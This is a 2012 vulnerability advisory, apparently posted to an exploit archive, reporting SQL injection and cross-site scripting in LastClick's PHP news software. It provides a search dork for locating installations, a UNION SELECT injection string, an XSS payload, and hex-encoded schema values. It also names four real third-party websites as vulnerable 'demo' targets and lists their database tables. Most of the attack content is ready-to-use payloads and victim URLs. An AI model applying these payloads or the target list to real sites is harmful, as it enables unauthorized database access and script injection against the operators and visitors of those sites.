LastClick Cross Site Scripting & SQL Injection

2012.11.07

Credit: Ur0b0r0x

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89
CWE-79

Dork: intext:Desarrollado www.lastclick.com.ar

  _    _ _____   ___  ____   ___  _____   _____   __
 | |  | |  __ \ / _ \|  _ \ / _ \|  __ \ / _ \ \ / /
 | |  | | |__) | | | | |_) | | | | |__) | | | \ V / 
 | |  | |  _  /| | | |  _ <| | | |  _  /| | | |> <  
 | |__| | | \ \| |_| | |_) | |_| | | \ \| |_| / . \ 
  \____/|_|  \_\\___/|____/ \___/|_|  \_\\___/_/ \_\

               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email:  ur0b0r0x_4n1@live.com
# Line:   GreyHat


# Exploit Title: LastClick - SQL Injection  / Cross-Site Scripting Vulnerabilities
# Dork: intext:Desarrollado www.lastclick.com.ar
# Date: 06/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.lastclick.com.ar/portfolio.php
# Vendor Name: LastClick
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[02/11/2012] - Vulnerability discovered
[05/11/2012] - Vendor notified Dont responsed
[06/11/2012] - Public disclosure 
--------------------------------------------------

# Expl0it/P0c ###################
http://site.com/*.ver_nota.php?id= < Sql Vulnerability Path >
http://site.com/*.ver_nota.php?id= < Xss Vulnerability Path >


# Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>  
# Payload/Comand/Sql=> table_schema=0x73616C61646173645F62617365 / table_name=0x6E6577736C6574657273

# Demo_Xss_Sql_Vulnerabilities
http://www.fmlaruta.com/noticias/ver_nota.php?id=1'
http://www.infoconcepcion.com.ar/sitio/ver_nota.php?id=1'
http://saladasdigital.com.ar/noticias/ver_nota.php?id=1'
http://www.marketingcorrientes.com/ver_nota.php?id=1'

# The Same Tables All Sites Vulnerability
[o] Tables [o]
+--------------------+
- audios 	
- banners 	
- breves 	
- buscadas 	
- contacto 	
- counter 	
- editorial 	
- encopciones_old 	
- encuesta_preguntas 	
- encuesta_respuestas 	
- encuestas_old 	
- eventos 	
- fotos 	
- lastmoment 	
- masfotos 	
- masleidas 	
- mensajes 	
- notasenportal 	
- noticias 	
- secciones 	
- secciones_portada 	
- seccionespublicidad 	
- slider 	
- tipo_galeria 	
- topicos 	
- videos
+------------------+

# Gr3t'x #########################
>> | Mr.Pack | Nick Nitrous  | Revolution_Hackers | Dylan Irzi | R00tc0d3r's |  SecurityDev | Mafia Dz | Algerian Hacker |
>> And All H4x0r5

References:

http://www.lastclick.com.ar/portfolio.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

LastClick Cross Site Scripting & SQL Injection

Dork: intext:Desarrollado www.lastclick.com.ar

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.